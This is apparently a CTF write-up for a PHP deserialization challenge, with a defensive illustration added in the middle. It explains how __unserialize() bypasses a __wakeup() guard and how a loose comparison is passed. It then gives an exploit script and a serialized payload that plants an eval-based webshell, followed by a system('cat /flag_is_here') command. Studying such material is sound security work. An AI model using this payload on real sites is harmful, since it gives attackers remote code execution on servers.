<?php
highlight_file(__FILE__);
class ctfshowvip{
    public $username;
    public $password;
    public $code;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __wakeup(){
        if($this->username!='' || $this->password!=''){
            die('error');
        }
    }
    public function __invoke(){
        eval($this->code);
    }
    public function __sleep(){
        $this->username='';
        $this->password='';
    }
    public function __unserialize($data){
        $this->username=$data['username'];
        $this->password=$data['password'];
        $this->code = $this->username.$this->password;
    }
    public function __destruct(){
        if($this->code==0x36d){
            file_put_contents($this->username, $this->password);
        }
    }
}
unserialize($_GET['vip']);
Auditing the code shows:
The class defines __unserialize(); on PHP 7.4 and above, unserialization goes through __unserialize() and the __wakeup() check is bypassed. In __destruct(), file_put_contents can write a file, which is enough to drop a one-line webshell. $this->code==0x36d is a loose (weak-typed) comparison, and 0x36d is not quoted, so it is a number, namely 877; strings such as 877a or 877.php therefore pass the comparison. So we set username='877.php' to pass the check.
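The following PHP script is an added illustration, not part of the original writeup or the challenge source. It reproduces the two properties the analysis relies on (loose comparison against 0x36d, and __unserialize() taking precedence over __wakeup() on PHP 7.4+) and then shows the defensive counterpart: strict comparison and unserialize() with allowed_classes disabled. The class name Probe and the helper functions looseCheck, strictCheck and safeUnserialize are names chosen here for the example.

```php
<?php
// Added example (not from the writeup): why the challenge's guards fail,
// and how a defensive version of the same code would look.

// 1. Loose vs strict comparison. The challenge tests $this->code == 0x36d,
//    and 0x36d is the integer 877. Under PHP 7.x a leading-numeric string
//    such as "877.php" compares equal to 877; under PHP 8 it does not.
function looseCheck($code): bool  { return $code == 0x36d;  }
function strictCheck($code): bool { return $code === 0x36d; }

var_dump(looseCheck("877.php"));   // true on PHP 7.x, false on PHP 8
var_dump(strictCheck("877.php"));  // false on every version

// 2. __unserialize() supersedes __wakeup() (PHP >= 7.4). When both exist,
//    only __unserialize() runs, so a guard placed in __wakeup() is dead code.
class Probe {
    public $username = '';
    public $password = '';
    public function __wakeup()              { echo "__wakeup called\n"; }
    public function __unserialize(array $d) { echo "__unserialize called\n"; }
}
unserialize(serialize(new Probe()));   // prints only "__unserialize called" on 7.4+

// 3. Defensive handling of untrusted serialized input: refuse to instantiate
//    any class, so no magic method (__wakeup/__unserialize/__destruct) fires.
//    Objects come back as __PHP_Incomplete_Class and are rejected outright.
function safeUnserialize(string $blob) {
    $value = unserialize($blob, ['allowed_classes' => false]);
    if ($value instanceof __PHP_Incomplete_Class) {
        throw new InvalidArgumentException('object payload rejected');
    }
    return $value;
}

try {
    safeUnserialize(serialize(new Probe()));
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
// Plain scalar/array data still round-trips (constructed sample input).
var_dump(safeUnserialize('a:1:{s:3:"key";s:5:"value";}'));
```

Part 3 only inspects the top-level value; an object nested inside an array would still arrive as __PHP_Incomplete_Class without being thrown on. For data that genuinely comes from a client, the safer design is not to call unserialize() on it at all and to use a format with no object semantics such as JSON.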
exp
<?php
// Same class name as the target, but without __sleep()/__wakeup(),
// so serialize() keeps username and password intact.
class ctfshowvip{
    public $username='877.php';
    public $password='<?php eval($_POST[1]);?>';
    public $code=0x36d;
}
echo serialize(new ctfshowvip());
payload: O:10:"ctfshowvip":3:{s:8:"username";s:7:"877.php";s:8:"password";s:24:"<?php eval($_POST[1]);?>";s:4:"code";i:877;}
Visit url/877.php
post: 1=system('cat /flag_is_here');
Get the flag.